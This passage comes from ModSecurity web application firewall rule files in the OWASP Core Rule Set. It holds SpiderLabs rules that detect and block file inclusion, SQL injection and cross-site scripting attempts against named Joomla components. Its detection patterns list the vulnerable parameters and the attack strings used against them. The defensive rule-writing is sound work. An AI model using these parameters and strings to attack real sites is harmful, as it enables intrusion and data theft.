"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012022,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_cbe" "chain" SecRule REQUEST_LINE "@contains task=userProfile" "chain" SecRule ARGS:tabname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component Billy Portfolio catid Parameter Blind SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012099,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component Billy Portfolio catid Parameter Blind SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_billyportfolio" "chain" SecRule REQUEST_LINE "@contains view=billyportfolio" "chain" SecRule ARGS:catid "(?i:and.*if\()" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component Billy Portfolio catid Parameter Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012131) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Seyret Video com_seyret Component Blind SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012131,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Seyret Video com_seyret Component Blind SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_seyret" "chain" SecRule REQUEST_LINE "@contains task=videodirectlink" "chain" SecRule ARGS:id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Seyret Video com_seyret Component Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_xmovie/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012166,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012345) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012345,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_frontenduseraccess" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012357) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_xgallery/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012357,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_swmenupro/ImageManager/Classes/ImageManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012369,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012430,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule ARGS:mosmsg "(?i:mosmsg\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt SecRule REQUEST_LINE "@contains admin.ponygallery.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012659,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_doqment" "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_smartformer/smartformer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012666,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012667) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component Media Mall Factory Blind SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012667,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component Media Mall Factory Blind SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_mediamall" "chain" SecRule ARGS:category "(?i:and.*substring\()" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component Media Mall Factory Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012697) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla virtuemart Blind SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012697,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla virtuemart Blind SQL Injection Attempt',tag:'web-application-attack'" SecRule ARGS_NAMES "(?i:page)" "chain" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_virtuemart" "chain" SecRule REQUEST_LINE "@contains substring" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla virtuemart Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012703) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012703,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012704,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012829) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012829,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hello" "chain" SecRule ARGS:secid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012830,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hello" "chain" SecRule ARGS:secid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012831) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012831,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hello" "chain" SecRule ARGS:secid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012832) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012832,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hello" "chain" SecRule ARGS:secid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hello" "chain" SecRule ARGS:secid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012837) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mgm/help.mgm.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012837,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jmsfileseller" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012995) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012995,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_people" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jfeedback" "chain" SecRule ARGS:controller "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013467) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013467,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013468) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013468,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013469) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013469,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013470) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013470,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013471) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013471,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_JOOMLA_RULES ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_lfi_attacks.conf�������0000664�0000000�0000000�00000464405�12164572564�0033065�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_lfi.data" "id:'2000001',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_LFI_RULES" # (2009377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion SecRule REQUEST_LINE "@contains /container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009377,rev:5,msg:'SLR: ET 